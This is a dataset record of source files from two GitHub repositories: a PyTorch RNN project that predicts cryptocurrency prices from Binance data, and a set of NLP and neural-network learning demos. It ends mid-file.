repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
phimachine/bitman
https://github.com/phimachine/bitman
3b9e0fb69335d534eed97855bd26dcf603e6abec
228beb7f49f9b0ffcbcf2945202af8f9bc3d74d8
344107eabc8f906d24e7e1f779ec176b6066984a
refs/heads/master
2022-05-31T06:12:34.968517
2018-04-01T07:33:04
2018-04-01T07:33:04
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7043478488922119, "alphanum_fraction": 0.782608687877655, "avg_line_length": 18.16666603088379, "blob_id": "26ba3058b6953ed0307da67ba5f2891e3dce3772", "content_id": "49d25dda5afb1a0a0eb0afd2c746fe530732c0e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 115, "license_type": "no_license", "max_line_length": 43, "num_lines": 6, "path": "/parameters.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "\nbatch_size=64\ntime_length=128\nhidden_size=64\ninput_size=9\n# the number of layers stacked in each unit\nnum_layers=8" }, { "alpha_fraction": 0.7932960987091064, "alphanum_fraction": 0.7932960987091064, "avg_line_length": 27.289474487304688, "blob_id": "d1e2bba6f09fe559154706e6cd135882cb9211aa", "content_id": "a429669599dbfede477ffcfb451b784b9fed580e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1074, "license_type": "no_license", "max_line_length": 82, "num_lines": 38, "path": "/README.md", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "## Introduction\n\nThis is an application that predicts the price of some cryptocurrency\nwith machine learning models.\n\nThe goal of this project is place automated bets to earn some money.\n\nThe purpose of this project is to familiarize myself with time series\nprediction with highly discontinuous, high dimensional inputs, which is\ngoing to be my work at Mayo Clinic this summer.\n\n## Modules\n### Bridge\nCommunicates with Binance API.\n\nBridge will get data from Binance for prediction.\n\nBridge will relay the model decision to Binance.\n\n### Pruner\nPruner takes in data from Bridge and prune them into PyTorch acceptable\nformats.\n\nPruner takes model decision output and pass it to API-compatible commands.\n\n### Model\nThis is the statistical model that takes in the pruned data and outputs decisions.\nThis will likely be a PyTorch model.\n\nWho knows? Maybe SVM or tree? Anything that makes money, right?\n\nMultiple models should be produced and selected for the best performance.\n\n\n### Trainer\n\nIf a neural network model is chosen, then Trainer will train the neural\nnetwork model." }, { "alpha_fraction": 0.532801628112793, "alphanum_fraction": 0.5798816680908203, "avg_line_length": 30.09600067138672, "blob_id": "67454d309aa184afc422baaad4d70b9c58bb2bd3", "content_id": "db577c2684553f7c1c0ec146d75a737293f5fc90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3887, "license_type": "no_license", "max_line_length": 114, "num_lines": 125, "path": "/br/bridge.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "from binance.client import Client\nfrom br.myapi import *\nimport pickle\nimport re\nimport os\nimport pathlib\n\ndef some_test():\n from_cache=True\n\n if from_cache==False:\n client = Client(api_key, api_secret)\n\n # get all symbol prices\n prices = client.get_all_tickers()\n\n # get market depth\n depth = client.get_order_book(symbol='BNBBTC')\n\n klines={}\n\n # fetch 1 minute klines for the last day up until now\n klines[\"1 day ago UTC, minute\"] = client.get_historical_klines(\n \"BNBBTC\", Client.KLINE_INTERVAL_1MINUTE, \"1 day ago UTC\")\n\n # fetch 30 minute klines for the last month of 2017\n klines[\"1 Dec, 2017 to 1 Jan, 2018, 30 minute\"] = client.get_historical_klines(\n \"ETHBTC\", Client.KLINE_INTERVAL_30MINUTE, \"1 Dec, 2017\", \"1 Jan, 2018\")\n\n # fetch weekly klines since it listed\n klines[\"1 Jan, 2017 to now, week\"] = client.get_historical_klines(\n \"NEOBTC\", Client.KLINE_INTERVAL_1WEEK, \"1 Jan, 2017\")\n\n # pickle them\n with open(\"klines.pkl\",\"wb\") as kline_pickle:\n pickle.dump(klines,kline_pickle)\n print('saved')\n\n else:\n with open(\"klines.pkl\",\"rb\") as kline_pickle:\n klines = pickle.load(kline_pickle)\n\n print('done')\n\n\nclass Bridge():\n def __init__(self):\n self.client = Client(api_key, api_secret)\n\n def get_prices(self):\n # get all symbol prices\n return self.client.get_all_tickers()\n\n def get_all_symbols(self):\n '''\n\n :param save:\n :return: a list of symbols string\n '''\n prices=self.get_prices()\n all_symbols=[i['symbol'] for i in prices]\n return all_symbols\n\n def get_klines(self, symbol, interval, start_str, end_str=None):\n\n '''\n :param symbol:\n :param interval:\n :param start_str:\n :param end_str:\n :return:\n\n Kline return value:\n\n 1499040000000, # Open time\n \"0.01634790\", # Open\n \"0.80000000\", # High\n \"0.01575800\", # Low\n \"0.01577100\", # Close\n \"148976.11427815\", # Volume\n 1499644799999, # Close time\n \"2434.19055334\", # Quote asset volume\n 308, # Number of trades\n \"1756.87402397\", # Taker buy base asset volume\n \"28.46694368\", # Taker buy quote asset volume\n \"17928899.62484339\" # Can be ignored\n\n Open, high, low and close are price values.\n Volume and number of trades are trade signatures.\n '''\n\n print (\"Getting \"+symbol+\" kline\")\n return self.client.get_historical_klines(symbol, interval, start_str, end_str)\n\n def get_file_name(self,btc_symbol,interval=\" 15 minute\"):\n if 'data' in str(pathlib.Path.cwd()):\n return \"btc_klines \" + btc_symbol + interval+ \".pkl\"\n else:\n return \"data/btc_klines \" + btc_symbol + interval+ \".pkl\"\n\n def get_btc_symbols(self):\n symbols = self.get_all_symbols()\n pattern = re.compile(\"^([A-Za-z])*BTC$\")\n btc_symbols = [i for i in symbols if pattern.match(i)]\n return btc_symbols\n\n def download_btc_klines(self, interval=Client.KLINE_INTERVAL_15MINUTE, start_str=\"1 May, 2017\", end_str=None):\n btc_symbols=self.get_btc_symbols()\n\n btc_klines = {}\n for btc_symbol in btc_symbols:\n filename=self.get_file_name(btc_symbol)\n\n if os.path.isfile(filename):\n with open(filename,'rb') as kline_pickle:\n print(filename+\" exists\")\n else:\n btc_klines[btc_symbol] = self.get_klines(btc_symbol, interval, start_str, end_str)\n with open(filename, \"wb\") as kline_pickle:\n pickle.dump(btc_klines, kline_pickle)\n\n\nif __name__==\"__main__\":\n bridge=Bridge()\n bridge.download_btc_klines()\n" }, { "alpha_fraction": 0.5865327715873718, "alphanum_fraction": 0.5912581086158752, "avg_line_length": 34.978721618652344, "blob_id": "abd7c1081b6acd186c3c05cd9bbea68c9178bcbb", "content_id": "7e8d1c45559ab78f0254eec04b932b1d805f7647", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1693, "license_type": "no_license", "max_line_length": 93, "num_lines": 47, "path": "/models/RMM.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn.modules.rnn import RNN\n\n\"\"\"\nThis is a recurrent network model.\nA RNN has a window of 1/4 of the total timestamps to learn the behavior of the curve.\nThat can be used to adjust the internal state of the RNN.\nAfter 1/4 of the total timestamps, the derivative starts to flow back and guide the training.\n\"\"\"\n\nclass RMM(nn.Module):\n '''\n RMM is a composite of RNN,\n with a dense network in the end\n '''\n\n def __init__(self,input_size, hidden_size, output_size,\n dense_layers_count=1, num_layers=1,\n bias=True,\n batch_first=False, dropout=0,\n bidirectional=False):\n super(RMM, self).__init__()\n self.output_size=output_size\n self.rnn=RNN(input_size=input_size,hidden_size=hidden_size,\n num_layers=num_layers,bias=bias,batch_first=batch_first,\n dropout=dropout,bidirectional=bidirectional)\n # of course, this is a critical line.\n self.dense_layers=nn.ModuleList()\n self.dense_layers_count=dense_layers_count\n\n try:\n for _ in range(self.dense_layers_count-1):\n self.dense_layers.append(nn.Linear(hidden_size,hidden_size))\n self.dense_layers.append(nn.Linear(hidden_size,output_size))\n except:\n raise\n\n def forward(self, input, hx=None):\n x, hidden_k=self.rnn(input,hx)\n for _ in range(self.dense_layers_count):\n try:\n x=self.dense_layers[_](x)\n except AttributeError:\n print(\"what the fuck\")\n raise\n return x\n\n\n" }, { "alpha_fraction": 0.8064516186714172, "alphanum_fraction": 0.8064516186714172, "avg_line_length": 14.75, "blob_id": "eb4c95ddefdb0326251fb9ef7bd85f8ae3d6a58b", "content_id": "4d1846a18e1a2a23b5f0628e7007017047d5d234", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/models/model.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "from parameters import *\nfrom models.RMM import RMM\n\nModel=RMM" }, { "alpha_fraction": 0.6143209934234619, "alphanum_fraction": 0.6259258985519409, "avg_line_length": 32.479339599609375, "blob_id": "b7f6b531172a9dc467d4368adef778a33caefeed", "content_id": "8bda9717c531a3aa1723c64e41ddc0fb42de5d38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4050, "license_type": "no_license", "max_line_length": 95, "num_lines": 121, "path": "/trainer/RNNtrainer.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "import pickle\nfrom models.model import Model\nfrom pr.pruner import Pruner\nfrom parameters import *\nfrom torch.nn.modules.loss import L1Loss\nfrom torch.optim import Adam\nfrom torch.autograd import Variable\nimport torch\nfrom pathlib import Path\nimport numpy\n\n# def train_one_batch(model, optimizer, criterion, input_sequence, price_targets):\n#\n# running_loss=0\n# # should this be called before each step?\n# optimizer.zero_grad()\n# output,hidden=model(input_sequence[:,0,:])\n#\n# for i in range(1,time_length//4):\n# # A window where the RNN adapts to the new sequence\n# # does not include end\n# # how is batch training handled this way?\n#\n# # I am hoping for [batch_size, output_size]\n# # and [batch_size, hidden_size] type of outputs\n# output,hidden=model(input_sequence[:,i,:],hidden)\n#\n# for i in range(time_length//4, time_length):\n# output,hidden=model(input_sequence[:,i,:],hidden)\n# # TODO need to verify that they are aligned\n# loss=criterion(output,price_targets[:,i])\n# loss.backward()\n# optimizer.step()\n# running_loss+=loss.data[0]\n# running_loss+= criterion(output, price_targets[:, i])\n# running_loss.backward()\n# optimizer.step()\n#\n# return running_loss.data[0]\n\ndef train_one_batch(model,optimizer, criterion, input_sequence, price_targets):\n\n running_loss=0\n output=model(input_sequence)\n\n # only outputs over time_length//4 will be considered\n # this has severe underflow problem.\n critical_output=output[time_length//4:]\n critical_price_targets=price_targets[time_length//4:]\n running_loss += criterion(critical_output,critical_price_targets)\n\n running_loss.backward()\n optimizer.step()\n\n return running_loss.data[0]\n\ndef train(model, criterion, optimizer, total_batches):\n\n running_loss = 0.0\n\n for batch_num in range(total_batches):\n data=pruner.get_batch(time_length,batch_size)\n\n # get the inputs\n inputs, labels = data\n\n # wrap them in Variable\n # inputs is a [64,128,9]\n # inputs=numpy.asarray(inputs)\n # labels=numpy.asarray(labels)\n # inputs=torch.from_numpy(inputs)\n # labels=torch.from_numpy(labels)\n # inputs, labels = Variable(inputs).cuda(), Variable(labels).cuda()\n #\n inputs=torch.Tensor(inputs)\n labels=torch.Tensor(labels)\n inputs=Variable(inputs).cuda()\n labels=Variable(labels).cuda()\n last_loss=train_one_batch(model,optimizer,criterion,inputs,labels)\n #\n #\n # # zero the parameter gradients\n # optimizer.zero_grad()\n #\n # # forward + backward + optimize\n # outputs = net(inputs)\n # loss = criterion(outputs, labels)\n # loss.backward()\n # optimizer.step()\n\n # print statistics\n print_frequency=10\n save_frequency=1000\n running_loss += last_loss\n if batch_num % print_frequency == print_frequency-1: # print every 2000 mini-batches\n print('[%5d] loss: %.3f' %\n (batch_num + 1, running_loss / print_frequency))\n running_loss = 0.0\n if batch_num% save_frequency==save_frequency-1:\n print(\"Saving state dict\")\n statedict_path=Path(\"trainer/state_dict_\"+str(batch_num)+\".pkl\")\n torch.save(model.state_dict(),statedict_path)\n print(\"Finished training\")\n\nif __name__==\"__main__\":\n pruner = Pruner()\n # pruner.reprepare()\n # batch_input = pruner.get_batch(time_length, batch_size)\n\n model = Model(input_size=input_size, hidden_size=hidden_size,\n output_size=1,\n dense_layers_count=3,\n num_layers=num_layers, bias=True, batch_first=True,\n dropout=1, bidirectional=False)\n model=model.cuda()\n total_batches = 12800\n\n criterion = L1Loss()\n criterion = criterion.cuda()\n optimizer = Adam(model.parameters())\n train(model,criterion,optimizer,total_batches)" }, { "alpha_fraction": 0.6847457885742188, "alphanum_fraction": 0.68813556432724, "avg_line_length": 28.600000381469727, "blob_id": "614befba7d6c74f9e4e8e611863e76f20b135f42", "content_id": "39b9dc64f5e0c90c262d25f8de7f3ef76e2b3fce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 295, "license_type": "no_license", "max_line_length": 66, "num_lines": 10, "path": "/br/myapi.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "# so that I don't have to publish my binance api to github\n\nwith open(\"/home/jasonhu/Documents/binance2.api\",'r') as api_info:\n api_info.readline()\n api_key=api_info.readline().strip()\n api_info.readline()\n api_secret=api_info.readline().strip()\n\n# print(api_secret)\n# print(api_key)" }, { "alpha_fraction": 0.5252912640571594, "alphanum_fraction": 0.5603893399238586, "avg_line_length": 35.462364196777344, "blob_id": "cd8f4e4288dd0e7002a61ef37823bf7effc992d6", "content_id": "42b9476c525e8a8a331027023bb1bef86d5a15d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6781, "license_type": "no_license", "max_line_length": 120, "num_lines": 186, "path": "/pr/pruner.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "import pickle\nimport os\nfrom br.bridge import Bridge\nfrom pathlib import Path\nimport random\nfrom parameters import *\n\n'''\n Kline return value:\n\n 1499040000000, # Open time\n \"0.01634790\", # Open\n \"0.80000000\", # High\n \"0.01575800\", # Low\n \"0.01577100\", # Close\n \"148976.11427815\", # Volume\n 1499644799999, # Close time\n \"2434.19055334\", # Quote asset volume\n 308, # Number of trades\n \"1756.87402397\", # Taker buy base asset volume\n \"28.46694368\", # Taker buy quote asset volume\n \"17928899.62484339\" # Can be ignored\n\n Open, high, low and close are price values.\n Volume and number of trades are trade signatures.\n\n The network does not take open time as a part of the input.\n We need everything except for the open time, close time and the can be ignored.\n'''\n\nclass Pruner():\n\n def __init__(self):\n self.bridge=Bridge()\n\n def reprepare(self):\n '''\n rewrites all data\n :return:\n '''\n self.prune_and_save(overwrite=True)\n self.get_length_for_all_pairs(load=False,save=True)\n\n\n def prune_and_save(self, overwrite=False):\n\n '''\n Pruned value:\n\n \"0.01634790\", # Open\n \"0.80000000\", # High\n \"0.01575800\", # Low\n \"0.01577100\", # Close\n \"148976.11427815\", # Volume\n \"2434.19055334\", # Quote asset volume\n 308, # Number of trades\n \"1756.87402397\", # Taker buy base asset volume\n \"28.46694368\", # Taker buy quote asset volume\n '''\n for symbol_pair in self.bridge.get_btc_symbols():\n filename = self.bridge.get_file_name(symbol_pair)[:-4] + \" pruned.pkl\"\n print(filename)\n\n if os.path.isfile(filename) and overwrite == False:\n print('pruned file already exists, no overwrite')\n else:\n with open(self.bridge.get_file_name(symbol_pair),'rb') as pickle_file:\n print(\"starting pruning \"+symbol_pair)\n klines_list=pickle.load(pickle_file)\n pruned_klines_list=[]\n\n for kline in klines_list[symbol_pair]:\n kline.pop(0)\n kline.pop(5)\n kline.pop(-1)\n kline=list(map(float,kline))\n pruned_klines_list.append(kline)\n\n with open(filename,'wb') as pickle_save:\n pickle.dump(pruned_klines_list,pickle_save)\n\n\n def get_length_for_all_pairs(self, load=True, save=False):\n '''\n 128 tickers form up one unit of operation.\n shuffled and fed into the network by batches\n\n The dataset has many pairs of trades. To sample unbiasedly, we need to find out the\n length of each pair of trade and produce the starting point of the 128-slice.\n\n Can such slice be produced at runtime?\n Maybe, why not?\n :return:\n '''\n\n if \"pr\" in str(Path.cwd()):\n file_path=Path(\"pairs_and_lengths.pkl\")\n else:\n file_path=Path(\"pr/pairs_and_lengths.pkl\")\n if file_path.exists() and load:\n with file_path.open('rb') as pickle_file:\n return pickle.load(pickle_file)\n else:\n # keys are the symbol pairs, values is (number_of_ticks, path) tuple\n paired_lengths = {}\n if \"pr\" in str(Path.cwd()):\n data_dir_path=Path(\"../data\")\n else:\n data_dir_path=Path(\"data\")\n pruned_list=list(data_dir_path.glob(\"*pruned.pkl\"))\n for pruned in pruned_list:\n with pruned.open(\"rb\") as pickle_file:\n klines=pickle.load(pickle_file)\n number_of_ticks=len(klines)\n if number_of_ticks<time_length+1:\n print('the length of '+str(pruned)+\" is too small.\")\n else:\n filename_splitted=str(pruned).split()\n if \"pr\" in str(Path.cwd()):\n # if \"pr\" is in the path, then pruned will look like \"../data/abc.data\"\n # this line makes it so that the path looks like \"data/abc.data\"\n paired_lengths[filename_splitted[1]] = (number_of_ticks, Path(*pruned.parts[2:]))\n else:\n paired_lengths[filename_splitted[1]] = (number_of_ticks, pruned)\n if save:\n with file_path.open('wb') as pickle_file:\n pickle.dump(paired_lengths,pickle_file)\n return paired_lengths\n\n def get_ticker_marker(self,time_length,batch_size):\n '''\n return batch_size number of tuple (ticker starting position, file_path)\n\n :param time_length:\n :param batch_size:\n :return:\n '''\n if \"pr\" in str(Path.cwd()):\n pairs_lengths_path=Path(\"../pr/pairs_and_lengths.pkl\")\n else:\n pairs_lengths_path=Path(\"pr/pairs_and_lengths.pkl\")\n with pairs_lengths_path.open('rb') as lengths_file:\n paired_lengths=pickle.load(lengths_file)\n\n # first we sample a pair, by weights decided by lengths\n # then we sample a starting position, evenly\n\n number_of_tickers=[value[0] for value in paired_lengths.values()]\n count_path_tuples=list(paired_lengths.values())\n\n sampled_count_path_tuples = random.choices(population=count_path_tuples,weights=number_of_tickers, k=batch_size)\n double_sampled_count_path_tuples=[]\n\n for count_path_tuple in sampled_count_path_tuples:\n start_mark=random.randint(0,count_path_tuple[0]-time_length-1)\n double_sampled_count_path_tuples.append((start_mark,count_path_tuple[1]))\n\n return double_sampled_count_path_tuples\n\n def get_batch(self,time_length,batch_size):\n '''\n Create a batch of x and y\n y is the close price at the next time step\n\n opening file costs time. Consider, if memory permits, caching the read/write\n\n :param time_length:\n :param batch_size:\n :return:\n '''\n ticker_marker=self.get_ticker_marker(time_length,batch_size)\n x=[]\n y=[]\n for marker, path in ticker_marker:\n with path.open(\"rb\") as pickle_file:\n klines=pickle.load(pickle_file)\n x.append(klines[marker:marker+time_length])\n y.append([kline[3] for kline in klines[marker+1:marker+time_length+1]])\n\n return (x,y)\n\nif __name__==\"__main__\":\n pruner=Pruner()\n pruner.reprepare()\n hello=pruner.get_batch(time_length,batch_size)\n print(\"done\")" } ]
8
pengpengda123/NlpLearning
https://github.com/pengpengda123/NlpLearning
5d7d4ff000a91a6eda52ba1b339f0bf5fce6394f
d09e44fe712e374b3499a8df33816ecd169b15d7
c57546d88b1f0447ab5ac0b14975735803e82359
refs/heads/master
2020-06-14T17:49:38.182163
2019-07-10T03:06:44
2019-07-10T03:06:44
195,077,183
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5214446783065796, "alphanum_fraction": 0.555304765701294, "avg_line_length": 27.913043975830078, "blob_id": "68b6acd3a41f17f5644e1557fa2792040061c73c", "content_id": "a925d3336caf984a2249133d9af9dbb24e27f603", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1347, "license_type": "no_license", "max_line_length": 68, "num_lines": 46, "path": "/worktest/load_alldata.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "# author:tanzhang\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch\nimport os\nimport time\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport numpy as np\ndef loaddata(from_path,save_path):\n # get data\n data = open(from_path, 'r', encoding='utf_8').read().split('\\n')\n # get first 5 sentence\n # get middle 10 sentence\n # get last 5 sentence\n d_f = open(save_path,'w',encoding='utf_8')\n count_1 = 15\n count_2 = 20\n count_3 = 15\n\n for line in data:\n line = line.replace('\\t',' ')\n line = line.split(' ')\n totalcount = len(line) # 当前行内总句子数目\n tdata = line\n if totalcount > (count_1+count_2+count_3+1):\n # first 25% second 50 last 25\n index_1 = 0\n index_2 = int(totalcount/2)\n index_3 = int(totalcount*0.75)\n print(line[index_1:count_1])\n print(line[index_2:count_2])\n print(line[index_3:count_3])\n first = line[index_1:count_1]\n first+=line[index_2:count_2]\n first+=line[index_3:count_3]\n tdata = first\n print(tdata)\n break\n for i in tdata:\n d_f.write(i)\n d_f.write(' ')\n d_f.write('\\n')\n\nif __name__=='__main__':\n loaddata('alldata_iron.tsv','alldata_iron_save.tsv')" }, { "alpha_fraction": 0.5815727710723877, "alphanum_fraction": 0.6214788556098938, "avg_line_length": 28.13675308227539, "blob_id": "41262802cf3738654aaa89d2a10df738f9469716", "content_id": "84d4262bd3f258870a5e759513c22f12c554e2fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3934, "license_type": "no_license", "max_line_length": 80, "num_lines": 117, "path": "/natualnet/demo_part2.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "# author:tanzhang\nimport torch\nimport numpy as np\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\nimport matplotlib.pyplot as plt\n# %matplotlib inline\ndef plot_decision_boundary(model, x, y):\n # Set min and max values and give it some padding\n x_min, x_max = x[:, 0].min() - 1, x[:, 0].max() + 1\n y_min, y_max = x[:, 1].min() - 1, x[:, 1].max() + 1\n h = 0.01\n # Generate a grid of points with distance h between them\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n # Predict the function value for the whole grid\n Z = model(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n # Plot the contour and training examples\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral)\n plt.ylabel('x2')\n plt.xlabel('x1')\n plt.scatter(x[:, 0], x[:, 1], c=y.reshape(-1), s=40, cmap=plt.cm.Spectral)\nprint('start......')\nnp.random.seed(1)\nm = 400 # 样本数量\nN = int(m/2) # 每一类的点的个数 200\nD = 2 # 维度\nx = np.zeros((m, D))\n# print(x.shape) # 400 2\ny = np.zeros((m, 1), dtype='uint8') # label 向量,0 表示红色,1 表示蓝色\n# print(y.shape) # 400 1\na = 4\n\nfor j in range(2):\n ix = range(N*j,N*(j+1)) # 0-200;200-400\n t = np.linspace(j*3.12,(j+1)*3.12,N) + np.random.randn(N)*0.2 # theta\n r = a*np.sin(4*t) + np.random.randn(N)*0.2 # radius\n x[ix] = np.c_[r*np.sin(t), r*np.cos(t)]\n y[ix] = j\nplt.scatter(x[:, 0], x[:, 1], c=y.reshape(-1), s=40, cmap=plt.cm.Spectral)\n'''\nPyTorch 中的模块,Sequential 和 Module。Sequential 允许我们构建序列化的模块,\n而 Module 是一种更加灵活的模型定义方式,我们下面分别用 Sequential 和 Module 来定义上面的神经网络。\n'''\n# trans x and y to Tensor from type of numpy.ndarray\nx = torch.from_numpy(x).float()\ny = torch.from_numpy(y).float()\n# Sequential\nseq_net = nn.Sequential(\n nn.Linear(2, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 4), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(4, 1)\n)\n# 序列模块可以通过索引访问每一层\nseq_net[0] # 第一层\n# 打印出第一层的权重\nw0 = seq_net[2].weight\n# hello\n# 通过 parameters 可以取得模型的参数\nparam = seq_net.parameters()\n# 定义损失函数\ncriterion = nn.BCEWithLogitsLoss()\n# 定义优化器\noptim = torch.optim.SGD(param, 1.)\n\n# 我们训练 10000 次\nfor e in range(10000):\n out = seq_net(Variable(x))\n loss = criterion(out, Variable(y))\n optim.zero_grad()\n loss.backward()\n optim.step()\n if (e + 1) % 1000 == 0:\n print('epoch: {}, loss: {}'.format(e+1, loss))\n# 定义两层神经网络的参数\n\ndef plot_seq(x):\n out = F.sigmoid(seq_net(Variable(torch.from_numpy(x).float()))).data.numpy()\n out = (out > 0.5) * 1\n return out\nplot_decision_boundary(lambda x: plot_seq(x), x.numpy(), y.numpy())\nplt.title('sequential')\nplt.show()\n\n# 模型的保存and读取操作\n# 将参数和模型保存在一起\ntorch.save(seq_net, 'save_seq_net.pth')\n# 读取保存的模型\nseq_net1 = torch.load('save_seq_net.pth')\n\n# 下面我们看看第二种保存模型的方式,只保存参数而不保存模型结构\n# 保存模型参数\ntorch.save(seq_net.state_dict(), 'save_seq_net_params.pth')\nseq_net2 = nn.Sequential(\n nn.Linear(2, 4),\n nn.Tanh(),\n nn.Linear(4, 1)\n)\nseq_net2.load_state_dict(torch.load('save_seq_net_params.pth'))" }, { "alpha_fraction": 0.5709658265113831, "alphanum_fraction": 0.6157243847846985, "avg_line_length": 28.798246383666992, "blob_id": "ff0152f7a70a63699131b9ddee8c525aadd567b1", "content_id": "724b47a628417cd4b6f1e224631982fd5f4ebf21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3522, "license_type": "no_license", "max_line_length": 105, "num_lines": 114, "path": "/natualnet/demo.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "# author tanzhang\nimport torch\nimport numpy as np\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\nimport matplotlib.pyplot as plt\n# %matplotlib inline\ndef plot_decision_boundary(model, x, y):\n # Set min and max values and give it some padding\n x_min, x_max = x[:, 0].min() - 1, x[:, 0].max() + 1\n y_min, y_max = x[:, 1].min() - 1, x[:, 1].max() + 1\n h = 0.01\n # Generate a grid of points with distance h between them\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n # Predict the function value for the whole grid\n Z = model(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n # Plot the contour and training examples\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral)\n plt.ylabel('x2')\n plt.xlabel('x1')\n plt.scatter(x[:, 0], x[:, 1], c=y.reshape(-1), s=40, cmap=plt.cm.Spectral)\nprint('start......')\nnp.random.seed(1)\nm = 400 # 样本数量\nN = int(m/2) # 每一类的点的个数 200\nD = 2 # 维度\nx = np.zeros((m, D))\n# print(x.shape) # 400 2\ny = np.zeros((m, 1), dtype='uint8') # label 向量,0 表示红色,1 表示蓝色\n# print(y.shape) # 400 1\na = 4\n\nfor j in range(2):\n ix = range(N*j,N*(j+1)) # 0-200;200-400\n t = np.linspace(j*3.12,(j+1)*3.12,N) + np.random.randn(N)*0.2 # theta\n r = a*np.sin(4*t) + np.random.randn(N)*0.2 # radius\n x[ix] = np.c_[r*np.sin(t), r*np.cos(t)]\n y[ix] = j\nplt.scatter(x[:, 0], x[:, 1], c=y.reshape(-1), s=40, cmap=plt.cm.Spectral)\n\n# use logistic\nx = torch.from_numpy(x).float()\ny = torch.from_numpy(y).float()\nw = nn.Parameter(torch.randn(2, 1))\nb = nn.Parameter(torch.zeros(1))\n\noptimizer = torch.optim.SGD([w, b], 1e-1)\n\ndef logistic_regression(x):\n return torch.mm(x, w) + b\n\ncriterion = nn.BCEWithLogitsLoss()\n\nfor e in range(100):\n out = logistic_regression(Variable(x))\n loss = criterion(out, Variable(y))\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (e + 1) % 20 == 0:\n print('epoch: {}, loss: {}'.format(e+1, loss))\n\ndef plot_logistic(x):\n x = Variable(torch.from_numpy(x).float())\n out = F.sigmoid(logistic_regression(x))\n out = (out > 0.5) * 1\n return out.data.numpy()\nplot_decision_boundary(lambda x: plot_logistic(x), x.numpy(), y.numpy())\nplt.title('logistic regression')\nplt.show()\n\n# use natualnet\n# 定义两层神经网络的参数\nw1 = nn.Parameter(torch.randn(2, 4) * 0.01) # 隐藏层神经元个数 2\nb1 = nn.Parameter(torch.zeros(4))\n\nw2 = nn.Parameter(torch.randn(4, 1) * 0.01)\nb2 = nn.Parameter(torch.zeros(1))\n\n# 定义模型\ndef two_network(x):\n x1 = torch.mm(x, w1) + b1\n x1 = F.tanh(x1) # 使用 PyTorch 自带的 tanh 激活函数\n x2 = torch.mm(x1, w2) + b2\n return x2\n\noptimizer = torch.optim.SGD([w1, w2, b1, b2], 1.)\n\ncriterion = nn.BCEWithLogitsLoss()\n\n# 我们训练 10000 次\nfor e in range(10000):\n out = two_network(Variable(x))\n loss = criterion(out, Variable(y))\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (e + 1) % 1000 == 0:\n print('epoch: {}, loss: {}'.format(e+1, loss))\n\ndef plot_network(x):\n x = Variable(torch.from_numpy(x).float())\n x1 = torch.mm(x, w1) + b1\n x1 = F.tanh(x1)\n x2 = torch.mm(x1, w2) + b2\n out = 